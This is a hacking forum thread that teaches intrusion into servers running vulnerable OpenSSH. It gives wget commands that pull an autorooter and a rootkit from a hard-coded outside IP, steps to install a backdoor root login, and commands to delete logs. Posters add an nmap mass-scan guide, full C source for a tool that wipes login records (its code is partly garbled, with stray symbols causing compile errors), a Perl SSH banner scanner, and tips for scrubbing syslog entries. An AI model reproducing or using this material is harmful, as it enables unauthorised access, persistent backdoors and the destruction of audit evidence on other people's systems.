First, we need some tools secureCRT (https://secure.vandyke.com/vandyke-bin/download_form.cgi?PRODUCT=SecureCRT_beta) A SSH Client to connect to an SSH box.. With this version u can SSH with a proxy LNX r00tkit (http://81.86.153.92/dd/lnx.gz) a rootkit, best there is i think.. Very easy to use.. Only needed in last step X6 (http://81.86.153.92/dd/x6.tgz) The Autorooter.. First, you gotta have a scan with vulernable ips (or just one ) WATcH OUT FOR SSH-1.99 OPENSSH 2.1.1 !! VERY VULERNABLE Almost always works for exploiting.. Lets say we got an IP, 0.0.0.0, and a shell.. Connect to your shell and type : wget http://81.86.153.92/dd/x6.tgz it downloads the autorooter to the shell.. When its done, Type : tar xzvf x6.tgz Then type cd x6 When in the dir, type : ./x6 -t# it shows u all the Exploitable SSH Versions.. Lets say we got an exploitable SSH-1.99-OpenSSH-2.1.1 (target 123 on the list) The Ip = 0.0.0.0 you type : ./x6 -t123 0.0.0.0 Now it says something like : ATTACH NOW.. Wait 6 Seconds then push Enter.. Normally it starts exploiting, it says like 1. 0x0000000 . . [SEGV] 2. 0x00000c4 . . [SURVIVED] Something like that.. Just let it go and it will exploit your box.. If it doesnt go to 1. ..., and it says FATAL: no its not vulernable Then, when it exploited the box, u get some thing like : no crash been found Rem from Remote : CHRIS CHRIS *** YOU ARE IN *** Boxname Boxhost blahblah then type the following cd /usr/man/man3/ and then : mkdir ". hiden" and then : cd "..." This is an hidden dir so the Sysop wont notice Now we r going to download the Rootkit type : wget http://81.86.153.92/dd/lnx.gz It will start downloading.. When done, type : tar xzvf lnx.gz and then: cd lnx Then, we r going to start it.. Lets say u want password "poop" on port 25374 then u type : ./own poop 25374 It Installs the Rootkit, and Done !! Connect to the ip with port 25374 (or the one u took) Username = root and u gave the password urself.. now CLEANIN (for no traces): rm -rf /var/logs/*





























SSH scan TUTORIAL USE nmap http://www.insecure.org/nmap/nmap_download.html syntax for SSH scanz nmap -O -sS -p 20-23,80,443 '194.65.*.*' > FILE.OUTPUT -O means guess remote OS -sS tcp syn stealth -p ports to scan (WE include ftp telnet and ssh and HTTP and secure http) and finaly the nets '194.65.*.*' it will scan from 194.65.1.1 to 194.65.254.254 have PHUnz ome Common Scan Types ('*' options require root privileges) * -sS TCP SYN stealth port scan (default if privileged (root)) -sT TCP connect() port scan (default for unprivileged users) * -sU UDP port scan -sP ping scan (Find any reachable machines) * -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only) -sR/-I RPC/Identd scan (use with other scan types) Some Common Options (none are required, most can be combined): * -O Use TCP/IP fingerprinting to guess remote operating system -p <range> ports to scan. Example range: '1-1024,1080,6666,31337' -F Only scans ports listed in nmap-services -v Verbose. Its use is recommended. Use twice for greater effect. -P0 Don't ping hosts (needed to scan www.microsoft.com and others) * -Ddecoy_host1,decoy2[,...] Hide scan using many decoys -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve] -oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile> -iL <inputfile> Get targets from file; Use '-' for stdin * -S <your_IP>/-e <devicename> Specify source address or network interface --interactive Go into interactive mode (then press h for help) Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*' SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES PROTEC ur NIX Before scanin or haxin i would recomend to change thiz vars. its very easy works on all linux versions.. just make a shell script with vi :: #!/bin/sh #### echo Protectin ur Env to a safe hax W0rk echo LOL.dDwAx #### echo 1 > /proc/sys/net/ipv4/tcp_syncookies echo 1 > /proc/sys/net/ipv4/conf/default/hidden echo 1 > /proc/sys/net/ipv4/conf/default/proxy_arp echo 1 > /proc/sys/net/ipv4/conf/default/forwarding echo 1 > /proc/sys/net/ipv4/conf/default/log_martians echo 1 > /proc/sys/net/ipv4/conf/default/rp_filter echo 1 > /proc/sys/net/ipv4/conf/eth0/hidden echo 1 > /proc/sys/net/ipv4/conf/eth0/proxy_arp echo 1 > /proc/sys/net/ipv4/conf/eth0/forwarding echo 1 > /proc/sys/net/ipv4/conf/eth0/log_martians echo 1 > /proc/sys/net/ipv4/conf/eth0/rp_filter #### echo Done echo now use ur nmap or ur exploits and have phunz ####

What other method might be used w00dy?

Heres the script i used to use when i was 'testing' my OWN computers. Its been a couple years, but it should still work... USE IT FOR THE SOLE USE OF TESTING ON COMPUTERS YOU OWN ..BLAH BLAH BLAH and all that other stufff that says im not liable

I compile it and then place it in /bin

then type:

cl u <username>
cl w <username>
cl l <username> <ip/host>

and that should clear utmp, wtmp and lastlog

clean.c <-- dont leave it named that when u compile it :/

====begin copying=====

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/uio.h>
#ifndef NO_ACCT
#include <sys/acct.h>
#endif
#include <utmp.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <ctype.h>
#include <string.h>
#include <pwd.h>
#include <time.h>
#include <stdlib.h>

#ifdef HAVE_LASTLOG_H
#include <lastlog.h>
#endif

#ifdef HAVE_UTMPX
#include <utmpx.h>
#endif

#ifndef UTMP_FILE
#ifdef _PATH_UTMP
#define UTMP_FILE _PATH_UTMP
#else
#define UTMP_FILE "/var/adm/utmp"
#endif
#endif

#ifndef WTMP_FILE
#ifdef _PATH_WTMP
define WTMP_FILE _PATH_WTMP
#else
#define WTMP_FILE "/var/adm/wtmp"
#endif
#endif

#ifndef LASTLOG_FILE
#ifdef _PATH_LASTLOG
#define LASTLOG_FILE _PATH_LASTLOG
#else
#define LASTLOG_FILE "/var/adm/lastlog"
#endif
#endif

#ifndef ACCT_FILE
#define ACCT_FILE "/var/adm/pacct"
#endif

#ifdef HAVE_UTMPX

#ifndef UTMPX_FILE
#define UTMPX_FILE "/var/adm/utmpx"
#endif

#ifndef WTMPX_FILE
#define WTMPX_FILE "/var/adm/wtmpx"
#endif

#endif /* HAVE_UTMPX */

#define BUFFSIZE 8192


/*
* This function will copy the src file to the dst file.
*/
void
copy_file(char *src, char *dst)
{
int fd1, fd2;
int n;
char buf[BUFFSIZE];

if ( (fd1 = open(src, O_RDONLY)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s during copy.\n", src);
return;
}

if ( (fd2 = open(dst, O_WRONLY | O_CREAT | O_TRUNC)) < 0 ) {
fprintf(stderr, "ERROR: Creating %s during copy.\n", dst);
return;
}

while ( (n = read(fd1, buf, BUFFSIZE)) > 0)
if (write(fd2, buf, n) != n) {
fprintf(stderr, "ERROR: Write error during copy.\n");
return;
}

if (n < 0) {
fprintf(stderr, "ERROR: Read error during copy.\n");
return;
}

close(fd1);
close(fd2);
}


/*
* UTMP editing.
*/
void
wipe_utmp(char *who, char *line)
{
int fd1;
struct utmp ut;

printf("Patching %s .... ", UTMP_FILE);
fflush(stdout);

/*
* Open the utmp file.
*/
if ( (fd1 = open(UTMP_FILE, O_RDWR)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", UTMP_FILE);
return;
}

/*
* Copy utmp file excluding relevent entries.
*/
while ( read(fd1, &ut, sizeof(ut)) > 0)
if ( !strncmp(ut.ut_name, who, strlen(who)) )
if (!line || (line &&
!strncmp(ut.ut_line, line, strlen(line)))) {
bzero((char *) &ut, sizeof(ut));
lseek(fd1, (int) -sizeof(ut), SEEK_CUR);
write(fd1, &ut, sizeof(ut));
}

close(fd1);

printf("Done.\n");
}

/*
* UTMPX editing if supported.
*/
#ifdef HAVE_UTMPX
void
wipe_utmpx(char *who, char *line)
{
int fd1;
struct utmpx utx;

printf("Patching %s .... ", UTMPX_FILE);
fflush(stdout);

/*
* Open the utmp file and temporary file.
*/
if ( (fd1 = open(UTMPX_FILE, O_RDWR)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", UTMPX_FILE);
return;
}

while ( (read(fd1, &utx, sizeof(utx)) ) > 0)
if ( !strncmp(utx.ut_name, who, strlen(who)) )
if (!line || (line &&
!strncmp(utx.ut_line, line, strlen(line)))) {
bzero((char *) &utx, sizeof(utx));
lseek(fd1, (int) -sizeof(utx), SEEK_CUR);
write(fd1, &utx, sizeof(utx));
}

close(fd1);

printf("Done.\n");
}
#endif


/*
* WTMP editing.
*/
void
wipe_wtmp(char *who, char *line)
{
int fd1;
struct utmp ut;

printf("Patching %s .... ", WTMP_FILE);
fflush(stdout);

/*
* Open the wtmp file and temporary file.
*/
if ( (fd1 = open(WTMP_FILE, O_RDWR)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", WTMP_FILE);
return;
}

/*
* Determine offset of last relevent entry.
*/
lseek(fd1, (long) -(sizeof(ut)), SEEK_END);
while ( (read (fd1, &ut, sizeof(ut))) > 0) {
if (!strncmp(ut.ut_name, who, strlen(who)))
if (!line || (line &&
!strncmp(ut.ut_line, line, strlen(line)))) {
bzero((char *) &ut, sizeof(ut));
lseek(fd1, (long) -(sizeof(ut)), SEEK_CUR);
write(fd1, &ut, sizeof(ut));
break;
}
lseek(fd1, (long) -(sizeof(ut) * 2), SEEK_CUR);
}

close(fd1);

printf("Done.\n");
}


/*
* WTMPX editing if supported.
*/
#ifdef HAVE_UTMPX
void
wipe_wtmpx(char *who, char *line)
{
int fd1;
struct utmpx utx;

printf("Patching %s .... ", WTMPX_FILE);
fflush(stdout);

/*
* Open the utmp file and temporary file.
*/
if ( (fd1 = open(WTMPX_FILE, O_RDWR)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", WTMPX_FILE);
return;
}

/*
* Determine offset of last relevent entry.
*/
lseek(fd1, (long) -(sizeof(utx)), SEEK_END);
while ( (read (fd1, &utx, sizeof(utx))) > 0) {
if (!strncmp(utx.ut_name, who, strlen(who)))
if (!line || (line &&
!strncmp(utx.ut_line, line, strlen(line)))) {
bzero((char *) &utx, sizeof(utx));
lseek(fd1, (long) -(sizeof(utx)), SEEK_CUR);
write(fd1, &utx, sizeof(utx));
break;
}
lseek(fd1, (int) -(sizeof(utx) * 2), SEEK_CUR);
}

close(fd1);

printf("Done.\n");
}
#endif

/*
* LASTLOG editing.
*/
void
wipe_lastlog(char *who, char *line, char *timestr, char *host)
{
int fd1;
struct lastlog ll;
struct passwd *pwd;
struct tm *tm;
char str[4];

printf("Patching %s .... ", LASTLOG_FILE);
fflush(stdout);

tm = (struct tm *) malloc( sizeof(struct tm) );

/*
* Open the lastlog file.
*/
if ( (fd1 = open(LASTLOG_FILE, O_RDWR)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", LASTLOG_FILE);
return;
}

if ( (pwd = getpwnam(who)) == NULL) {
fprintf(stderr, "ERROR: Can't find user in passwd.\n");
return;
}

lseek(fd1, (long) pwd->pw_uid * sizeof(struct lastlog), 0);
bzero((char *) &ll, sizeof(ll));

if (line)
strncpy(ll.ll_line, line, strlen(line));

if (timestr) {
/* YYMMddhhmm */
if (strlen(timestr) != 10) {
fprintf(stderr, "ERROR: Time format is YYMMddhhmm.\n");
return;
}

/*
* Extract Times.
*/
str[2] = 0;
str[0] = timestr[0];
str[1] = timestr[1];
tm->tm_year = atoi(str);

str[0] = timestr[2];
str[1] = timestr[3];
tm->tm_mon = atoi(str) - 1;

str[0] = timestr[4];
str[1] = timestr[5];
tm->tm_mday = atoi(str);

str[0] = timestr[6];
str[1] = timestr[7];
tm->tm_hour = atoi(str);

str[0] = timestr[8];
str[1] = timestr[9];
tm->tm_min = atoi(str);
tm->tm_sec = 0;

ll.ll_time = mktime™;
}

if (host)
strncpy(ll.ll_host, host, sizeof(ll.ll_host));


write(fd1, (char *) &ll, sizeof(ll));

close(fd1);

printf("Done.\n");
}


#ifndef NO_ACCT
/*
* ACCOUNT editing.
*/
void
wipe_acct(char *who, char *line)
{
int fd1, fd2;
struct acct ac;
char ttyn[50];
struct passwd *pwd;
struct stat sbuf;
char *tmpf;

printf("Patching %s .... ", ACCT_FILE);
fflush(stdout);

/*
* Open the acct file and temporary file.
*/
if ( (fd1 = open(ACCT_FILE, O_RDONLY)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", ACCT_FILE);
return;
}

/*
* Grab a unique temporary filename.
*/
tmpf = tmpnam((char *) NULL);

if ( (fd2 = open(tmpf, O_WRONLY | O_CREAT | O_TRUNC, 600)) < 0 ) {
fprintf(stderr, "ERROR: Opening tmp ACCT file\n");
return;
}

if ( (pwd = getpwnam(who)) == NULL) {
fprintf(stderr, "ERROR: Can't find user in passwd.\n");
return;
}

/*
* Determine tty's device number
*/
strcpy(ttyn, "/dev/");
strcat(ttyn, line);
if (stat(ttyn, &sbuf) < 0) {
fprintf(stderr, "ERROR: Determining tty device number.\n");
return;
}

while ( read(fd1, &ac, sizeof(ac)) > 0 ) {
if ( !(ac.ac_uid == pwd->pw_uid && ac.ac_tty == sbuf.st_rdev) )
write(fd2, &ac, sizeof(ac));
}

close(fd1);
close(fd2);

copy_file(tmpf, ACCT_FILE);

if ( unlink(tmpf) < 0 ) {
fprintf(stderr, "ERROR: Unlinking tmp WTMP file.\n");
return;
}

printf("Done.\n");
}
#endif


void
usage()
{
printf("USAGE: wipe [ u|w|l|a ] ...options...\n");
printf("\n");
printf("UTMP editing:\n");
printf(" Erase all usernames : wipe u [username]\n");
printf(" Erase one username on tty: wipe u [username] [tty]\n");
printf("\n");
printf("WTMP editing:\n");
printf(" Erase last entry for user : wipe w [username]\n");
printf(" Erase last entry on tty : wipe w [username] [tty]\n");
printf("\n");
printf("LASTLOG editing:\n");
printf(" Blank lastlog for user : wipe l [username]\n");
printf(" Alter lastlog entry : wipe l [username] [tty] [time] [host]\n");
printf(" Where [time] is in the format [YYMMddhhmm]\n");
printf("\n");
#ifndef NO_ACCT
printf("ACCT editing:\n");
printf(" Erase acct entries on tty : wipe a [username] [tty]\n");
#endif
exit(1);
}

int
main(int argc, char *argv[])
{
char c;

if (argc < 3)
usage();

/*
* First character of first argument determines which file to edit.
*/
c = toupper(argv[1][0]);

/*
* UTMP editing.
*/
switch © {
/* UTMP */
case 'U' :
if (argc == 3)
wipe_utmp(argv[2], (char *) NULL);
if (argc ==4)
wipe_utmp(argv[2], argv[3]);

#ifdef HAVE_UTMPX
if (argc == 3)
wipe_utmpx(argv[2], (char *) NULL);
if (argc == 4)
wipe_utmpx(argv[2], argv[3]);
#endif

break;
/* WTMP */
case 'W' :
if (argc == 3)
wipe_wtmp(argv[2], (char *) NULL);
if (argc == 4)
wipe_wtmp(argv[2], argv[3]);

#ifdef HAVE_UTMPX
if (argc == 3)
wipe_wtmpx(argv[2], (char *) NULL);
if (argc == 4)
wipe_wtmpx(argv[2], argv[3]);
#endif

break;
/* LASTLOG */
case 'L' :
if (argc == 3)
wipe_lastlog(argv[2], (char *) NULL,
(char *) NULL, (char *) NULL);
if (argc == 4)
wipe_lastlog(argv[2], argv[3], (char *) NULL,
(char *) NULL);
if (argc == 5)
wipe_lastlog(argv[2], argv[3], argv[4],
(char *) NULL);
if (argc == 6)
wipe_lastlog(argv[2], argv[3], argv[4],
argv[5]);
break;
#ifndef NO_ACCT
/* ACCT */
case 'A' :
if (argc != 4)
usage();
wipe_acct(argv[2], argv[3]);
break;
#endif
}

return(0);
}
================ cut here ================

Bl00dy G00d Post M8's

I Like this very much thankyou "Jerk-Off" and thankyou "W00dy"

This will definetley be studied to test security blah blah blah etc.....

How ever dont you need a shell first in order to exploit SSH ??

I am new to SSH exploiting so please forgive me if I say something and it aint true

Also I found a SSH Scan Code

Maybe It Can Usefull For You

Code Starts Below

#!usr/bin/perl
#
#################################################################
# #
# Digital WrapperZ - SSH Security Shell Scanner #
# Digital Wrapperz are: m4st3r_syst3m :: Dropper :: c0d3r_b0y #
# Apenas para funs educacionais e violativos! #
# g00d h4ck1n'!! #
# #
#################################################################
#

use IO::Socket::INET;

print"\n\n\n\n\n\n\n dddddd tttt";
print"\n ddddddd gg tttttttt LLLL";
print"\n dd dd ii gg gg ii ttt aaaaaa LLL";
print"\n dd dd iii gg gg iii ttt aa aa LLL";
print"\n dd dd iii gg iii tt aa aa LLL";
print"\n dd dd iii gg gg iii tt aaaaaaa LL";
print"\n ddddddd ii gg gg ii tt aaa aaa LLLLL";
print"\n dddddd ii gggg ii t aa aa LLLLLLLL";
print"\n\n - _ - _ - _ - _ - _ -";
print"\n __-+-__-+-__-+-__-+-...WrapperZ...-+-__-+-__-+-__-+-__";
print"\n - _ - _ - _ - _ - _ -";
print"\n\n\n\n\n\n";
sleep 2;
print"\n\n\n\n -- Security Shell (SSH) Scanner --";
print"\n\n coded by:";
print"\n c0d3r_b0y of Digital WrapperZ";
print"\n\n\n\n\n\n\n\n\n\n\n\n------------------------------------------------------------------------";
print "\nNome do arquivo de lista: ";
chop (my $lista=<stdin>);
print "\nNome do arquivo de resultados: ";
chop (my $resul=<stdin>);
print"\n";
$porta_num = 22;
my @host;
open(LISTA,"$lista") or die "\nErro ao abrir $lista: Arquivo inexistente ou corrompido! $!";
print "\n\n\n [SCAN!!]\n";
while (<LISTA>)
{
$host[$a] = $_;
chomp $host[$a];
$a++;
$b++;
}
close(LISTA);
$a = 0;
while ($a < $b)
{
print "\nEscaneando $host[$a]... ";
chomp $host[$a];
my $soquete = IO::Socket::INET -> new(
PeerAddr=>"$host[$a]",
PeerPort=>"$porta_num",
Proto=>"tcp",
);
select((select($soquete), $| = 1)[0]);
print $soquete "\r\n\r\n";
@resposta = <$soquete>;
shutdown($soquete,1);
if(@resposta[0] =~/SSH/)
{
print "[OK!]";
open(RES,">>$resul");
print RES "$host[$a] -=> @resposta[0]";
close RES;
}
else
{
print "[Sem Security Shell!]";
}
$a++;
}
print "\n\n\n------------------------------------------------";
print "\n Salvando resultados em $resul .";
sleep 1;
print " .";
sleep 1;
print " . [Pronto!]";
print "\n Escaneamento completo!\n Cheque em $resul para ver a lista de sites rodando SSH.";
print "\n\n\n";
sleep 1;
print "--------------------------------------------------------------\n";
print " Digital WrapperZ\n";
print " - - - - - - - - - - - - -\n";
print " digitalwrapperz\@email.com\n";
print "--------------------------------------------------------------\n\n";

Code Ends Here

Best Regards

Adam

Vast Gsm Team

Da Sick Crew

can someone compile the ssh scanner from DJVASTVASTY2K please

#!usr/bin/perl .. means its a perl script and theres no need to compile it. Get yourself a perl interpreter and run the script with it...

If you are careful you don't need to play with the logs. Woody's method is better than erasing /var/log/* but still is not the answer.

A way not to leave a trace in the computers wtmp logs is by killing your shell, instead of leaving the system via "exit" or "logout" command. just find the pid of your shell and kill -9 pid. This won't leave a trace in the system logs.

Though deamons like ssh/ftp/telnet whatever you have used to enter the system, will write a line or some lines of log to syslog. That is something that you have to clean with your hand, manually eg. cat /var/log/messages | grep -v myip > /tmp/log; mv /tmp/log /var/log/messages

etc etc more on that you have to search for remote logging and other traps that could exist in the system.

creep01

jurk off great post indeed but yur web server is down

plus: woody check this out:
woody.c: In function `wipe_lastlog':
woody.c:341: warning: assignment makes integer from pointer without a cast
woody.c:341: parse error before character 0231
woody.c: In function `main':
woody.c:467: parse error before character 0251
woody.c:482: break statement not within loop or switch
woody.c:484: case label not within a switch statement
woody.c:497: break statement not within loop or switch
woody.c:499: case label not within a switch statement
woody.c:512: break statement not within loop or switch
woody.c:515: case label not within a switch statement
woody.c:519: break statement not within loop or switch
woody.c: At top level:
woody.c:523: parse error before `return'

hey all the links are broken... please renew/restore them or upload the files to your post...
thanks

i found a nice log wiper called die_putze it can be found on packetstorm security

can anyone fix the links/upload the files?
10x m8s
it will be great if someone will make a good log cleaner for linux...

I agree, simply pulling an 'rm -rf /var/logs/*' is a sure tell-tale sign to the administrator, but if you've defaced the website (as a statement to the admin), then hey; you might aswell just delete the logs .

links still down... sorry to be a buggah but it looks really tempting... can you atleast say which exploits are those?


edit: tried "index of" x6.tgz and i found it thanks for the tip (lol everyone posted that stuff but i forgot about it already)

good work good work, =)
soon you'll have ypur very own roots.. yey..

wooooopy!!! (even though ive been using the openssl exploit for a while now)

where can i find the source code of x6?
or atleast any1 here knows on what vul it working?

aint this exploit not really old? Sure it should be private and all just like X2 but damn this is just soooo outdated? Or am i wrong.. I would put some effort in the do_brk(); vulnerable. Might be way more usefull


Tho, nice to share us

Gr. woutiir

hscan can do banner scanning

Can u tell me whats wrong, if i got

No Crash, might have worked
error on read, continuing


when it trys to Attach with different rets =?

Somethin wrong with my Linux or the target have FW ore something like that ?
MUCH THX 4 HELP !!

thank you for exploit

nice tutorial but please give the crdit to the writer !

"Droidsect" from israel !

lol -israel rullleezz the scene !

have anyone good offset, I tried some few days ago and no one work :/